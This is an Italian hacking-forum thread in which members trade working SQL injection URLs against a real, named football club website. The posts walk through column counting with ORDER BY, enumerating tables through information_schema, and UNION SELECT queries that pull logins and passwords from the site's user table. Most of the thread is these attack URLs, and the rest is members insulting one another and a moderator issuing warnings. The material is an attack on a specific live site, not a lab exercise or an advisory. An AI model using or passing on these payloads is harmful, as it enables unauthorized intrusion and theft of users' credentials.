[Vagabondo] PisaCalcio.it SQL Injection

[Luke34]

e loro come hanno capito che ra usr ?? -_-''

quindi dovrebbe essere cosi ?

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74%20UNION%20ALL%20SELECT,1,login,password,2,3,4,5,6,7%20FROM%20usr_users--

 

[V1R5]

vir5 si sta scaldando xD in pratica sta cercando di dirti che dato che non sai come si chiamano, [size=xx-large]devi "buttarti" finchè non centri il nome giusto.[/size]

Se la tabella degli utenti non sai come si chiama, [size=xx-large]prova [/size]"users",altrimenti altri nomi, "info_users", [size=xx-large]finchè non trovi quello giusto^^[/size]

[size=xx-large]e loro come hanno capito che ra usr ?? -_-''[/size]

Tu hai dei problemi.

 

[MEME]

[ot]eppoi mi warnano se mi irrito rispondendo ai topic >.> [/ot]

 

[RedSkull]

Ma sei fuori ?
Dant3 ha provato e riprovato FINCHE' non ha provato usr_users.
di solito le sql inj li fanno chi ha esperienze di db (magari installandosi il cms[se utilizzato] in locale poprio per capire certe cose...
se non sai comè è fatto un db non puoi sapere come fare una sql inj.
è come voler realizzare un sito web se non si conosce html/php NON puoi farlo...
(a meno chè non usi programmi come dreamweaver, ma per le sql inj non esistono programmi.)

 

[imported_D4nt3]

XD immaginavo fosse anti-lamer XD

cmq complimenti, hai riempito una pagina della sezione, appena posso ti piazzo un +1

Lo sto ancora aspettando bro XD Dante


Ciò che ti sto per far leggere, sono insegnamenti, E IO NON INSEGNO MAI. Quindi nn fare più domande a arrivaci da solo.

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 6-- => no errore
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 7-- => errore

Domanda: sarà forse l'ultimo errore?

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 10000-- =>errore diverso da quello del 7

Risposta: no. Ancora:

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 8-- => ancora mezzo errore
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 9-- => ERRORE COMPLETO

Numero colonne: 8

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,2,3,4,5,6,7,8--

Estraiamo nome tabelle e colonne:
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,2,3,4,5,6,7,8 FROM information_schema.COLUMNS--

Numeri stringa da editare:
2 - 3
6 - 31-12-1899 - 00:00

7

2, 3, 6, 7.

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,table_name,column_name,4,5,6,7,8 FROM information_schema.COLUMNS--

Oltre nn vado. Mi dispiace, ma mi rifiuto. Se sai un MINIMO di SQL allora capisci cm andare avanti. Dante

 

[imported_Bronsa]

ma lui NON sa un minimo di sql sennò avrebbe capito tutto dalla guida...

 

[Luke34]

XD immaginavo fosse anti-lamer XD

cmq complimenti, hai riempito una pagina della sezione, appena posso ti piazzo un +1

Lo sto ancora aspettando bro XD Dante


Ciò che ti sto per far leggere, sono insegnamenti, E IO NON INSEGNO MAI. Quindi nn fare più domande a arrivaci da solo.

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 6-- => no errore
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 7-- => errore

Domanda: sarà forse l'ultimo errore?

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 10000-- =>errore diverso da quello del 7

Risposta: no. Ancora:

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 8-- => ancora mezzo errore
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 9-- => ERRORE COMPLETO

Numero colonne: 8

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,2,3,4,5,6,7,8--

Estraiamo nome tabelle e colonne:
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,2,3,4,5,6,7,8 FROM information_schema.COLUMNS--

Numeri stringa da editare:
2 - 3
6 - 31-12-1899 - 00:00

7

2, 3, 6, 7.

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,table_name,column_name,4,5,6,7,8 FROM information_schema.COLUMNS--

Oltre nn vado. Mi dispiace, ma mi rifiuto. Se sai un MINIMO di SQL allora capisci cm andare avanti. Dante

questo lo posso sfruttare anche con altre sql injection ?

edit:
username:http://www.pisacalcio.it/stagione/tabellino.html?iId=-74%20union%20all%20select%201,login,3,3,4,5,6,7%20from%20usr_users
password : http://www.pisacalcio.it/stagione/tabellino.html?iId=-74%20union%20all%20select%201,password,2,3,4,5,6,7%20from%20usr_users

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74%20union%20all%20select%201,concat%28login,char%2858%29,password%29,2,3,4,5,6,7%20from%20usr_users

---

non ho capito solo questo
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74%20UNION%20SELECT%201,table_name,column_name,4,5,6,7,8%20FROM%20information_schema.COLUMNS--

che sarebbero i CHARACTER_SETS

 

[imported_Bronsa]

... perchè 2 url per user & pass??

questo dimostra che non conosci CONCAT... e che non conosci il sql

 

[Luke34]

... perchè 2 url per user & pass??

questo dimostra che non conosci CONCAT... e che non conosci il sql

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 union all select 1,concat(login,char(58),password,2,3,4,5,6,7 from usr_users

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 union all select 1,concat(login,0x3a,password),2,3,4,5,6,7 from usr_users

 

[RedSkull]

adesso unisci a quello che ti abbiamo detto a questo: www.evilsocket.net/papers/sqlinjections.pdf

 

[Luke34]

adesso unisci a quello che ti abbiamo detto a questo: www.evilsocket.net/papers/sqlinjections.pdf

ma è giusto quello che ho scritto

c'è ancora una cosa: quando digito

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74%20union%20all%20select%201,table_name,2,3,4,5,6,7%20from%20information_schema.tables

mi esce scritto

CHARACTER_SETS - 2
5 - 31-12-1899 - 00:00

6

qule sarebbe la tabella ?

invece per la colonna


CHARACTER_SET_NAME - 2
5 - 31-12-1899 - 00:00

6

 

[imported_AlexZ]

Scusami...ma è assolutamente ridicolo...io ammetto di non capirne molto di Sql, però penso che per poter elaborare un SQL Injection sia necessario conoscere dapprima l'SQL dopodichè leggere tutorial sull SQL injection o sulle blind...
Ti consiglio di dare un'occhiata qui prima!!

 

[RedSkull]

mi esce scritto

CHARACTER_SETS - 2
5 - 31-12-1899 - 00:00

6

qule sarebbe la tabella ?

invece per la colonna


CHARACTER_SET_NAME - 2
5 - 31-12-1899 - 00:00

6

LOOL ancora non ti sei reso conto che CHARACTER_SETS è il nome di una tabella...
questo è perchè NON SAI QUELLO CHE STAI FACENDO...
se provi ad usare limit ti accorgerai subito dei cambiamenti... (per esempio:
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74%20UNION%20SELECT%201,column_name,table_name,4,5,6,7,8%20FROM%20information_schema.COLUMNS%20limit%206,1--
se provi a cambiare il numero messo in limit ti accorgerai che stai guardando delle tabelle)
Cmq basta ho finito di aiutarti...
non c'è peggior sordo di chi non vuol sentire...

 

[imported_Bronsa]

... perchè 2 url per user & pass??

questo dimostra che non conosci CONCAT... e che non conosci il sql

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 union all select 1,concat(login,char(58),password,2,3,4,5,6,7 from usr_users

http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 union all select 1,concat(login,0x3a,password),2,3,4,5,6,7 from usr_users

Owned il pazzo
Persino edo riuscirebbe a fare copia incolla da qualche altra sql inj ma ciò non vuol dise sapere il sql...e tu non sai il sql altrimenti sapresti cos'e CHARACTER_SETS

 

[imported_D4nt3]

Luke34.. Nasconditi. Che pazzo provi a dire OWNED? Questa SQL è stata fatta da 25 persone porca ***** e immagino che ora la spaccerai per tua dai, nn ti voglio qua, anche se il sito nn è mio, qua nn ce devi sta. Vattene. Vai su eurohackers.it. Dante

 

[V1R5]

Luke34.. Nasconditi. Che pazzo provi a dire OWNED? Questa SQL è stata fatta da 25 persone porca ***** e immagino che ora la spaccerai per tua dai, nn ti voglio qua, anche se il sito nn è mio, qua nn ce devi sta. Vattene. Vai su eurohackers.it. Dante

Purtroppo condivido, non tanto per l'essere newbie (sono sempre ammessi) ma per il fatto che non ascolti, fingi di sapere, e sfotti pure.

 

[Luke34]

Luke34.. Nasconditi. Che pazzo provi a dire OWNED? Questa SQL è stata fatta da 25 persone porca ***** e immagino che ora la spaccerai per tua dai, nn ti voglio qua, anche se il sito nn è mio, qua nn ce devi sta. Vattene. Vai su eurohackers.it. Dante

eurohackers? ma per piacere , una massa di ....


:-/

 

[MrDarkest]

Abbassiamo i toni? Devo usare il warn?

 

[V1R5]

Abbassiamo i toni? Devo usare il warn?

Così non si spaventa più nessuno, banna o warna direttamente ; )

 

[MrDarkest]

[ot]Devo riabituarmi a fare il mod severo XD[/ot]

 

[RedSkull]

dai ragazzi chiudiamo...

 

[imported_D4nt3]

Luke34.. Nasconditi. Che pazzo provi a dire OWNED? Questa SQL è stata fatta da 25 persone porca ***** e immagino che ora la spaccerai per tua dai, nn ti voglio qua, anche se il sito nn è mio, qua nn ce devi sta. Vattene. Vai su eurohackers.it. Dante

eurohackers? ma per piacere , una massa di ....


:-/

Una massa di tuoi simili Dante

 

[MrDarkest]

Warn a dante e chiudo